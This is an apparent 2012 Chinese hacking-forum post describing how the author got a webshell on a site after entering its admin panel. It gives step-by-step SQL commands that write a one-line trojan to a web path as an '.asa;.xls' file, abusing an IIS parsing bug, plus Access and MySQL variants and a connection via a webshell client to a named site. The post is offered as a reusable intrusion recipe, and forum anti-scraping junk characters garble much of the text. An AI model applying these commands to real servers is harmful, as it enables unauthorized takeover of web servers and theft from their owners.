中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
3 n5 l1 i0 x3 p3 p) {9 E  i: ^4 k5 Hwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
$ c  j5 K4 S/ R7 l+ p( F3 m* ]文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,+ m* c1 V! U' b# M% E
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
4 w- v% R' h/ C: [% b1.create table cmd (a varchar(50))
9 E$ ]4 ~. Y: i$ r* b  A2.insert into cmd (a) values (‘‘)8 m* \9 ^5 d, D* n- m; J
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd% M# a( [: D3 }4 [' U- C  w( d
(把表cmd的内容导出为物理路径的一个EXCEL文件), A9 x# `" y' ^
4.drop table cmd
: p; |2 G) r* X- O  o$ E0 w利用IIS的BUG成功拿到了WEBSHELL。
, m; Y3 C) b$ }2 r2 t7 ~# q: ], l- i6 a# B# ~" e- h# x
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
1 Q3 f' ~0 R1 G( b" m' [- I6 J, o8 m5 C
  SQL语句意思解释:0 D+ G9 O  m* e( e/ K: W
  第一句
  g+ }# E4 y4 H; g  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50  v% R/ ^6 @* c( O5 \) @- Y! y
& A' i5 Z' h$ I
  第二句
* n& ~5 e+ k0 a2 c3 B- m( o# W  p  在表cmd的a字段插入一句话木马
5 h* X9 Z) p5 v) D! a9 |8 |  第三句
! I/ Z! B! b& K& v2 V5 J4 Y0 \  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
1 ~4 h/ o. |) w- R: X, [, O7 d, @4 z" O2 c
  第四句
; d8 Q% \% j/ E+ o% T! o  删除建立的cmd表
! B6 L' z. v, ]3 V# o" L
' \5 l+ y) k+ d/ P  以下内容为测试:9 L8 \) e* ]& k" H% _
  Access利用后台SQL执行命令功能导出WebShell:
! M5 X, p7 ^6 _- c2 f  b" f  H9 J  这个更简单:3 J; Y9 C: {( T, h! m  {7 D! K9 L
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]! O2 n( t- v% d! \, q
  或者
8 q! A, e$ Y* r  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
+ X: _& k1 m2 ?% ]* j; |; i$ z1 X: s6 S' V
  后台有执行SQL语句功能(vote为已知表段)
$ U) S( D. ?& O  希望对大家有所帮助拿shell的又一个思路8 \- x7 z  u) I





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2